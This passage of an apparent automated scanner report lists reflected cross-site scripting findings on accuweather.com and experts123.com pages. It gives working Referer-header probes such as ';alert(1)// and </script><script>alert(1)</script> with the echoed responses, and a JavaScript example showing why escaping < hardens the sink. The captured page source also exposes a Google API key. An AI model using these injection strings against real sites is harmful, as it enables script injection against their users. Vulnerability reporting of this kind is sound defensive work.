Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /maps-satellite.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64040
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:14 GMT
Connection: close
Set-Cookie: acm=ct1=Los+Angeles&uf0=nyc&lid=1&uf3=ord&zp2=33128&st0=NY&pty=accu&st2=FL&pt=accuweather&ct2=Miami&uf1=59l&zp0=10017&pti=&ins=aches%2Dpains&ct3=Chicago&uf2=mia&zp1=90012&inm=health&zp3=60605&st1=CA&ver=0&st3=Il&ct0=New+York&ptu=&mt=0; expires=Sat, 05-Mar-2011 00:00:00 GMT; path=/
Set-Cookie: aco=dbg=0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<script>var apgUserInfoObj={country:'US',city:'New York',state:'NY',metro:'',zip:'10017',partner:'accuweather',referer:'http://www.google.com/search?hl=en&q=ea202</script><script>alert(1)</script>53080030620'};var apgWxInfoObj={ut:'0',cu:{wx:'',hi:'',wd:'',hd:'',uv:''},fc:[{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''},{wx:'',hi:'',lo:''}],ix:{arthritis:'',asthma:'',bbq:'',cold:'',dogwalk:'',flu:'',indoor:'',law
...[SNIP]...
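Why the </script> probe in the two accuweather findings works without ever closing the JavaScript string, shown as an added example that is not part of the scanner report or of the site's code. The page template is a reconstruction of the captured apgUserInfoObj line and is assumed. The scanner below implements only the HTML tokenizer's script-data end condition, which is enough to show that JSON.stringify on its own does not fix this sink and that escaping < does.

```javascript
// Added example: shows why the </script> probe recorded against
// www.accuweather.com works although the referer value sits inside a single-
// quoted JavaScript string that is never closed. The HTML tokenizer, not the
// JavaScript parser, decides where a <script> element ends. The page template
// is a reconstruction of the captured apgUserInfoObj line and is assumed.

// Splits an HTML fragment into the script bodies a browser would execute.
// Implements only the script-data end condition from the HTML tokenizer:
// "</script" (case-insensitive) followed by tab, LF, FF, space, "/" or ">".
// JavaScript quoting is irrelevant to it, which is the whole point. The
// escaped-script-data states (entered on "<!--") are not modelled; they do
// not change the outcome for these inputs.
function scriptBodies(html) {
  const bodies = [];
  const open = /<script\b[^>]*>/gi;
  let m;
  while ((m = open.exec(html)) !== null) {
    const start = m.index + m[0].length;
    const close = /<\/script[\t\n\f />]/gi;
    close.lastIndex = start;
    const c = close.exec(html);
    bodies.push(html.slice(start, c ? c.index : html.length));
    open.lastIndex = c ? c.index + c[0].length : html.length;
  }
  return bodies;
}

// Vulnerable: referer concatenated into a single-quoted literal, as captured.
function renderVulnerable(referer) {
  return "<script>var apgUserInfoObj={partner:'accuweather',referer:'" + referer + "'};</script>";
}

// Half a fix: JSON.stringify escapes quotes and backslashes but leaves "</script>" alone.
function renderJsonOnly(referer) {
  return '<script>var apgUserInfoObj={partner:"accuweather",referer:' + JSON.stringify(referer) + '};</script>';
}

// Hardened: additionally escape "<" so the tokenizer never sees "</script".
// \u003c is a valid escape in both JavaScript and JSON, so the value round-trips.
function renderHardened(referer) {
  const literal = JSON.stringify(referer).replace(/</g, '\\u003c');
  return '<script>var apgUserInfoObj={partner:"accuweather",referer:' + literal + '};</script>';
}

// The scanner's probe, as sent in the Referer header of finding 1.666.
const PROBE = 'http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2';

// Number of script elements the browser would run for a given rendering:
// 2 means the probe split the element and its own <script> executes.
function scriptCount(render) {
  return scriptBodies(render(PROBE)).length;
}

// Does the hardened literal still decode to the original referer value?
function hardenedRoundTrips() {
  return JSON.parse(JSON.stringify(PROBE).replace(/</g, '\\u003c')) === PROBE;
}

console.log(scriptCount(renderVulnerable), scriptCount(renderJsonOnly), scriptCount(renderHardened)); // 2 2 1
console.log(scriptBodies(renderVulnerable(PROBE))[1]); // alert(1)
```

The same scanner applied to the double-quoted var REFERRAL sink in 1.669 gives the same result; the quoting style of the literal never enters into it.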

1.668. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d80de'%3balert(1)//2bbe976dfa9 was submitted in the Referer HTTP header. This input was echoed as d80de';alert(1)//2bbe976dfa9 in the application's response. The application URL-decodes the header before embedding it (the %3b arrives as a semicolon), which is why the probe can close the string, terminate the statement and use // to comment out the rest of the line, including the original closing quote and parenthesis.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d80de'%3balert(1)//2bbe976dfa9

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35111


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=d80de';alert(1)//2bbe976dfa9');
});


</script>
...[SNIP]...

1.669. http://www.experts123.com/q/general-mortgage-information-what-is-a-mortgage-828301.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/general-mortgage-information-what-is-a-mortgage-828301.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2434"%3balert(1)//40b9502e47 was submitted in the Referer HTTP header. This input was echoed as e2434";alert(1)//40b9502e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/general-mortgage-information-what-is-a-mortgage-828301.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2434"%3balert(1)//40b9502e47

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 35109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "e2434";alert(1)//40b9502e47";
var RSQ = true;

$(function() {
experts123.Question.initialize(828301, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.670. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:17 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=58da2';alert(1)//bbd7524fdca');
});


</script>
...[SNIP]...

1.671. http://www.experts123.com/q/how-are-mortgage-properties-registered.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/how-are-mortgage-properties-registered.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 30482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "bcd6c";alert(1)//f1f27091f7b";
var RSQ = true;

$(function() {
experts123.Question.initialize(630175, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.672. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "25f3f";alert(1)//41fc69da3be";
var RSQ = true;

$(function() {
experts123.Question.initialize(821025, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.673. http://www.experts123.com/q/what's-the-best-checking-account-for-me.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what's-the-best-checking-account-for-me.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=fdc6b';alert(1)//1fcabebdc24');
});


</script>
...[SNIP]...

1.674. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=ccc8e';alert(1)//6bb3a5f1c5f');
});


</script>
...[SNIP]...

1.675. http://www.experts123.com/q/what-is-a-checking-account-limit.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-checking-account-limit.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "1947f";alert(1)//760c35e1ead";
var RSQ = true;

$(function() {
experts123.Question.initialize(880822, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.676. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=a50b1';alert(1)//6a7613daa75');
});


</script>
...[SNIP]...

1.677. http://www.experts123.com/q/what-is-a-commercial-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-commercial-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
USERNAME = "";
var USERID = "";
var PROFILE_URL = "";
var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA";
var REFERRAL = "d5395";alert(1)//8cf555a3bfa";
var RSQ = true;

$(function() {
experts123.Question.initialize(893817, 1, 'UA-6611450-1');


});
</script>
...[SNIP]...

1.678. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:57 GMT
Connection: close
Content-Length: 34659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=1a44e';alert(1)//5f700a46bff');
});


</script>
...[SNIP]...

1.679. http://www.experts123.com/q/what-is-a-mortgage-lender.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /q/what-is-a-mortgage-lender.html

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.

